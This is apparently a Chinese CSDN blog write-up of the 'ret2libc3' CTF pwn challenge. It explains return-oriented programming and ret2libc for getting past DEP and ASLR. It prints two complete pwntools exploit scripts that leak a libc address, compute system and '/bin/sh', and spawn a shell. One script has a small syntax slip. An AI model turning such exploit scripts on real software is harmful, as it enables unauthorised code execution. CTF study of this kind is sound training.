ret2libc3_通过 ROP 绕过 DEP 和 ASLR 防护

最新推荐文章于 2022-07-06 19:17:04 发布
最新推荐文章于 2022-07-06 19:17:04 发布
阅读量822 收藏 2
点赞数
分类专栏: # 例题分析 文章标签: pwn rop libc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/89949671
版权

题目:link > m93t

ROP的全称为 Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。
常见的程序流劫持就是栈溢出格式化字符串攻击堆溢出
通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的方法有DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护)
ret = return-to-libc 是一种对抗linux系统栈保护的攻击方法

注:
0.有相关libc文件
1.没有system/bin/sh
2.在开启地址随机化和DEP保护的时候,我们无法利用正常的函数泄露去获取shell
3.在没有sysytem的时候,systemwrite的相对地址是不会变的。 我们可以利用write(延迟捆绑技术)输出真实的write函数的地址(首选需要调用一次write函数)
4.系统在调用write@plt的时候会将write的真实地址存放在write@got表里面,会根据write@got跳转到write的位置)
5.利用system_addr = (write_addr -write@plt) + system@plt => libc_base + system@plt 。知道了libc_base就等于知道了libc库的加载基地址

EXP

注:常见的有泄露__libc_start_main函数, 获取libc_base -> system
LibcSearcher 一个基于libc_database写的python库

# -*- coding: utf-8 -*-
from pwn import*
from LibcSearcher import LibcSearcher

p = process('./ret2libc3')
libc = ELF('./ret2libc3')


#通过工具获得__libc_start_main@got
print "1"   #如果出错知道在哪个环节

plt_puts = libc.plt['puts']
got_libc_start_main = libc.got['__libc_start_main']
main_addr = libc.symbols['main']
print "[+]plt_puts:"+hex(plt_puts)
print "[+]got_libc_start_main:"+hex(got_libc_start_main) 
print "[+]main_addr:"+hex(main_addr)

print "2"
#泄露got_libc_start_main的地址
payload = flat(['A' * 112,plt_puts,main_addr,got_libc_start_main])
p.recvuntil('Can you find it !?')
p.sendline(payload)
libc_start_main_addr = u32(p.recv()[0:4])
print "[+]libc_start_main_addr :" +hex(libc_start_main_addr)

print "3"
#泄露libc库
libc_link = LibcSearcher('__libc_start_main',libc_start_main_addr)
#函数地址 - 函数偏移 = libc_base
libc_base =  libc_start_main_addr - libc_link.dump('__libc_start_main')
system_addr = libc_base + libc_link.dump('system')
bin_sh_addr = libc_base + libc_link.dump('str_bin_sh')

print "get shell"
payload = flat(['A'*104,system_addr,0xdeadbeef,bin_sh_addr])
p.sendline(payload)
p.interactive()

注:原先我是通过找到__libc_start_main (地址后三位),在libc—datebase里面去查找,然后根据自己使用的glibc的版本去泄露偏移地址
这个脚本工具,是基于libc-datebase的数据库,我们可以直接用脚本跑出来,减少了去gdb内部找地址。

EXP(write)

注:这个脚本适用于带有write函数的题目,和本题类似,利用思路是一样的。

from pwn import*

libc = ELF('./ret2libc3')
elf = ELF('./ret2libc3')p = process('./ret2libc3')

plt_write = elf.plt['write']
got_write = elf.sym['write']
main_addr = 0x80484D0


payload = 'A'*140
payload += p32(plt_write)
payload += p32(main_addr)
payload += p32(1)
payload += p32(got_write)
payload += p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))

system_addr = write_addr - libc.sym['write'] + libc.sym['system']
bin_sh_addr = write_addr - libc.sym['write'] + next(libc.search('/bin/sh'))
payload = 'A'*140
payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh_addr)

p.sendline(payload)
p.interactive()

参考链接:
工具使用:https://blog.csdn.net/kevin66654/article/details/87282411

Jc^
关注
专栏目录
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8302
本文主要介绍带DEP防护ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
ROP和Ret2libc漏洞
最新发布
qq_67812668的博客
08-12 937
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
[pwn]ROP绕过ASLR&NX
热门推荐
Breeze的博客
05-27 1万+
# [详细] ROP绕过ASLR&NX 这次使用的程序是Defcon - 2015初赛题目,r0pbaby,也是一道经典的pwn题目了。 NX策略是指在栈中的代码不会被执行,ASLR是使共享库的装载位置随机化不可预测。 信息搜集 首先查看是64位还是32位文件: 然后查看安全策略: 可见开启了NX和PIE,PIE也就是ASLR。然后在IDA中查看伪代码,无需详细阅读,直接找溢出函数即...
栈溢出基本ROP绕过ASLR和NX保护
ditto的博客
12-28 3570
菜鸡刚学rop,总结下,算是对蒸米大佬这篇文章最后一个样例的一点解释说明。 笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645 计算溢出点的位置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点) https://github.com/zhengmin1989/ROP_STEP_BY_STEP 预备知识: 了解动态链接中P...
利用ROP绕过DEP(Defeating DEP with ROP)调试笔记
thesum的专栏
04-25 519
http://www.05112.com/anquan/gjbc/hkbc/2014/1105/16034.html 有空再仔细读了
内存安全试验:ret2libc绕过DEP
weixin_42072280的博客
05-08 746
参考资料 1.https://www.cnblogs.com/0831j/p/9219243.html (实验、原理) 2.https://www.cnblogs.com/xidian-wws/p/10819073.html(getenvaddr那个的说明) 实验过程中的一些问题 ...
linux栈溢出4-绕过ROPASLR(不知道libc.so)
小强的博客
07-31 1196
调试环境是ubuntu14 32位 这次开启了DEPASLR(不知道libc.so情况下) 还是参考了《一步一步学ROP之linux_x64篇》这篇文章。 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf
二进制漏洞挖掘之栈溢出-开启NX未开启ASLR
ylcangel的专栏
10-18 1163
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
二进制漏洞挖掘之栈溢出-开启NX开启ASLR
ylcangel的专栏
10-18 990
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
【逆向学习记录】学习《一步一步学ROP_x86》
卦星的专栏
01-11 1493
1.概述 通过前面三篇文章,学习栈帧,GOT表,PLT表,接下来就可以进行漏洞利用,漏洞利用学习最好的方法就是利用经典,其中经典教学里面最经典的当属蒸米大神的一步一步教学系列 一步一步学ROP之linux_x86篇 – 蒸米 蒸米大神的文章,是实战类型,里面有不少细节的东西,对于我这种没有基础的人来讲,如果不理解是很容易忘记的,因此进行原理上的学习探索 环境:ubuntu 16.04 编译需要在原...
Ret2libc
iextract的博客
04-24 662
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
ret2libc(可绕NX但不可绕PIE和ASLR,因为PIE会使ELF本身随机化,ASLR会使libc.so基址随机化)
EternalBurning的博客
11-12 415
ret2libc能直接找到system和/bin/shchecksec泄漏点偏移libc调用exp找不到/bin/shchecksec检查漏洞函数确认偏移查找是否有系统调用字符串 能直接找到system和/bin/sh checksec 泄漏点 偏移 108+4=112 libc调用 程序中有外部引入system()函数 所以我们接下来找/bin/sh就可以了 exp 找不到/bin...
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2361
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
保护机制
the_owl的专栏
02-06 1125
系统环境 virtualbox 4.3.20 +ubuntu 11.10 return to libc漏洞原理 1,不使用shellcode 2,
对抗栈帧地址随机化/ASLR的两种思路和一些技巧
a_18067的博客
11-04 824
栈帧地址随机化是地址空间布局随机化(Address space layout randomization,ASLR)的一种,它实现了栈帧起始地址一定程度上的随机化,令攻击者难以猜测需要攻击位置的地址。 第一次遇到这个问题是在做cs:app3e/深入理解操作系统attacklab实验的时候,后来在做学校的一个实验的时候也碰到了这个问题,最近在看一篇“上古黑客”写的文章的时候又碰到了这个...
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5311
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
pwn ——ret2libc3
qq_41696518的博客
07-06 839
ret2libc3
Linux使用ROP进行栈溢出攻击
stonesharp的专栏
08-06 3201
过Protostar stack6演示Linux下ROP的简单使用,ROP就是所谓的Return Orientated Programming,早期也叫ret2libc,关于ROP的介绍可以看早期的文章《CVE2012-1889 Exploit编写(三)》,思路是一样的,只是平台换到了Linux下而已。 0×01. __builtin_return_address函数 先介绍下__bu
linux栈溢出-绕过ROPASLR(知道libc.so)
小强的博客
07-28 1612
调试环境是ubuntu14 32位 这次开启了DEPASLR,在linux x86溢出,知道libc.so文件的情况下 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256); } int main(i
Linuxexploit:解析ret2libc攻击与绕过栈保护
"Return-to-libcexploit是一种针对Linux系统中栈保护机制的黑客技术,它允许攻击者利用程序运行时栈内存进行控制流劫持,从而绕过系统的安全防护。本文档由SaifEl-Sherei撰写,旨在介绍和理解这一高级攻击手段,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值